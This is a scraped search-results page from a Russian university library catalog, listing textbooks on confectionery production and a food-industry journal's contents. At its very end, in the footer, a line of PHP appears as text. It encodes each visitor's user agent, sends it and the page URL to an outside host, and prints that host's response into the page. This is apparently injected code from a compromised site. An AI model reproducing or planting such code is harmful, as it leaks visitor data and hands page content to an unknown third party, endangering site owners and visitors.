Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

49 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ДРАЖЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Лурье И. С. Технология кондитерского производства [Текст] / И. С. Лурье, 1992. - 399 с.
Держатели документа (Информация об экземплярах) 
2. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
3. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

4. 
Пищевая промышленность. - Журнал, 2010г. № 4
Оглавление 
  • Скрынник, Е. Б. АПК: курс на модернизацию и дальнейшее поступательное развитие / Е. Б. Скрынник. - с.8-10
    Кл. слова: АПК
  • Спиричев, В. Б. Обогащение пищевых продуктов микронутриентами: научные принципы и практические решения / В. Б. Спиричев, Л. Н. Шатнюк. - с.20-24
    Кл. слова: МИКРОНУТРИЕНТЫ
  • Развитие перерабатывающих предприятий АПК в области обеспечения безопасности и качества продуктов питания. - с.25-27
    Кл. слова: КАЧЕСТВО ПРОДУКТОВ ПИТАНИЯ, МЕНЕДЖМЕНТ КАЧЕСТВА, БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Булатов, Д. С. Экспорт продовольствия: "дитя без глазу" / Д. С. Булатов. - с.28-29
    Кл. слова: ЭКСПОРТ продовольствия
  • Харитонова, Т. В. Общая концепция устойчивого развития предприятия пищевой промышленности / Т. В. Харитонова. - с.30-32
    Кл. слова: ПРЕДПРИЯТИЕ ПРОМЫШЛЕННОЕ, ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ
  • Скляренко, С. А. Анализ показателей энергопотребления на предприятиях пищевой промышленности / С. А. Скляренко, Т. М. Панченко. - с.32-34
    Кл. слова: ЭНЕРГЕТИКА ПРЕДПРИЯТИЯ, ЭНЕРГОЗАТРАТЫ
  • Резго, Г. Я. Внедрение инновационных технологий хранения как путь решения проблемы обеспечения продовольственной безопасности / Г. Я. Резго, М. А. Николаева. - с.35-37
    Кл. слова: ХРАНЕНИЕ ПИЩЕВЫХ ПРОДУКТОВ, ПОТЕРИ ТОВАРНЫЕ
  • Определение витамина Е методом флуориметрии. - с.38-40
    Кл. слова: ВИТАМИНЫ, флуориметрия
  • Макарова, Н. В. Спектрофотометрический метод для определения содержания фенольных соединений / Н. В. Макарова, А. В. Зюзина, Ю. И. Мирошкина. - с.41-42
    Кл. слова: АНТИОКСИДАНТ, КОНЦЕНТРАТ соков
  • Осташенкова, Н. В. Анализ наночастиц в пищевых продуктах и упаковочных материалах методом электронной микроскопии / Н. В. Осташенкова, Н. Н. Котова, О. В. Красноярова. - с.44-45
    Кл. слова: НАНОЧАСТИЦА, НАНОТЕХНОЛОГИИ
  • Каленик, Т. К. Возможности оптимизации питания / Т. К. Каленик, Д. В. Купчак. - с.50-51
    Кл. слова: ОПТИМИЗАЦИЯ питания, ЗДОРОВЬЕ НАСЕЛЕНИЯ
  • Вековцев, А. А. Инновационная технология БАД: характеристика потребительских свойств / А. А. Вековцев, Е. О. Ермолаева, Г. А. Подзорова. - с.52-53
    Кл. слова: БАД, ПРОФИЛАКТИКА желудочно-кишечных заболеваний
  • Ермолаева, Е. О. Разработка и оценка качества БАД "Алконейтрал" / Е. О. Ермолаева, Н. А. Плешкова, А. Н. Австриевских. - с.53
    Кл. слова: АЛКОГОЛИЗМ, Алконейтрал
  • Гурьянов, Ю. Г. Молочное драже в шоколаде, обогащенное микронутриентами / Ю. Г. Гурьянов, Е. Ю. Лобач, В. М. Поздняковский. - с.54
    Кл. слова: МИКРОНУТРИЕНТЫ, ДРАЖЕ
  • Сухая пшеничная клейковина: функциональные свойства, перспективы применения. - с.56-59
    Кл. слова: КЛЕЙКОВИНА, БЕЛОК, СУШКА
5. 
Производство хлеба, хлебобулочных и кондитерских изделий. Торты и пирожные [Текст] / сост. В. А. Шипов, 1999. - 286 с.
Держатели документа (Информация об экземплярах) 
6. 
Драгилев А. И. Технология кондитерских изделий [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / А. И. Драгилев, И. С. Лурье, 2003. - 429 с.
Держатели документа (Информация об экземплярах) 
7. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

8. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
9. 
Сборник основных рецептур сахаристых кондитерских изделий [Текст] : сборник / Сост. Н. С. Павлова, 2003. - 230 с.
Держатели документа (Информация об экземплярах) 
10. 
Скобельская З. Г. Технология производства сахарных кондитерских изделий [Текст] : Учеб. для учреждений нач. проф. образования / З. Г. Скобельская, Г. Н. Горячева, 2002. - 412 с.
Держатели документа (Информация об экземплярах) 
11. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] : Учеб. для вузов по специальностям "Технология хлеба, кондит. и макарон. изделий", "Машины и аппараты пищевых пр-в" / А. И. Драгилев, Г. А. Маршалкин, 1999. - 447 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2875 - 24.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.15 с.14 запросов, 0.69c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;